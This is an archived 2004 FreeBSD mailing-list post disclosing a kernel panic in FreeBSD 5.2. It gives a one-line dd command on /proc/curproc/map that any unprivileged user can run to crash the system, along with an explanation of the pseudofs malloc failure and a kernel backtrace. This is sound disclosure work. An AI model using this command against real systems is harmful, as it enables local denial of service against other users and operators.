Skip site navigation (1)Skip section navigation (2) 
Date:      Sat, 31 Jan 2004 00:24:58 -0800
From:      Joel Ray Holveck <joelh@piquan.org>
To:        hackers@freebsd.org
Subject:   Panic in /proc
Message-ID:  <87n084cyp1.fsf@thor.piquan.org>
next in thread | raw e-mail | index | archive | help 
Here's a way to panic FreeBSD 5.2, as any user:

    dd if=/proc/curproc/map iseek=0x8000 bs=4096 of=/dev/null count=1

I briefly examined the core.  It appears that pseudofs is trying to
malloc an sbuf big enough to hold everything up to the 128 MB mark
that we requested, which it intends to get procfs to fill.  Of course,
the malloc fails, and the kernel panics.

I'm normally not inclined to bother tracking down most panics, but
this was interesting because it can be done as any user, not just
root.  That makes it a local unprivileged DOS.

For the interested, here's a backtrace from my 5.2-RELEASE box.  I was
trying to read a slightly different address in this; I think it was
0x8048000.

    panic: kmem_malloc(134516736): kmem_map too small: 37502976 total allocated

    #0  doadump () at ../../../kern/kern_shutdown.c:240
    #1  0xc054a3ba in boot (howto=256) at ../../../kern/kern_shutdown.c:372
    #2  0xc054a6c7 in panic () at ../../../kern/kern_shutdown.c:550
    #3  0xc0673ce0 in kmem_malloc (map=0xc10330a0, size=134516736, flags=2)
        at ../../../vm/vm_kern.c:342
    #4  0xc0683577 in page_alloc (zone=0x0, bytes=0, pflag=0x0, wait=0)
        at ../../../vm/uma_core.c:842
    #5  0xc0684d92 in uma_large_malloc (size=134516736, wait=2)
        at ../../../vm/uma_core.c:2024
    #6  0xc05405bd in malloc (size=134516736, type=0xc076fa00, flags=2)
        at ../../../kern/kern_malloc.c:253
    #7  0xc056bc0b in sbuf_new (s=0xc3764940, buf=0x0, length=0, flags=0)
        at ../../../kern/subr_sbuf.c:187
    #8  0xc05096b6 in pfs_read (va=0x0) at ../../../fs/pseudofs/pseudofs_vnops.c:528
    #9  0xc05a9bd3 in vn_read (fp=0xc39d3d04, uio=0xd3d9dc80, active_cred=0x0, 
        flags=0, td=0xc33713c0) at vnode_if.h:398
    #10 0xc056ea0c in dofileread (td=0xc33713c0, fp=0xc39d3d04, fd=0, 
        buf=0xbfbfcb5c, nbyte=0, offset=0, flags=0) at ../../../sys/file.h:237
    #11 0xc056e86b in read (td=0xc33713c0, uap=0xd3d9dd14)
        at ../../../kern/sys_generic.c:109
    #12 0xc06c76a2 in syscall (frame=
          {tf_fs = 47, tf_es = 47, tf_ds = 47, tf_edi = -1077943348, tf_esi = -1077943336, tf_ebp = -1077943388, tf_isp = -740696716, tf_ebx = 2, tf_edx = 0, tf_ecx = 43, tf_eax = 3, tf_trapno = 12, tf_err = 2, tf_eip = 671900527, tf_cs = 31, tf_eflags = 662, tf_esp = -1077949652, tf_ss = 47})
        at ../../../i386/i386/trap.c:1010
    #13 0xc06b8a5d in Xint0x80_syscall () at {standard input}:136

Cheers,
joelh

-- 
Joel Ray Holveck - joelh@piquan.org
   Fourth law of programming:
   Anything that can go wrong wi
sendmail: segmentation violation - core dumped

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?87n084cyp1.fsf>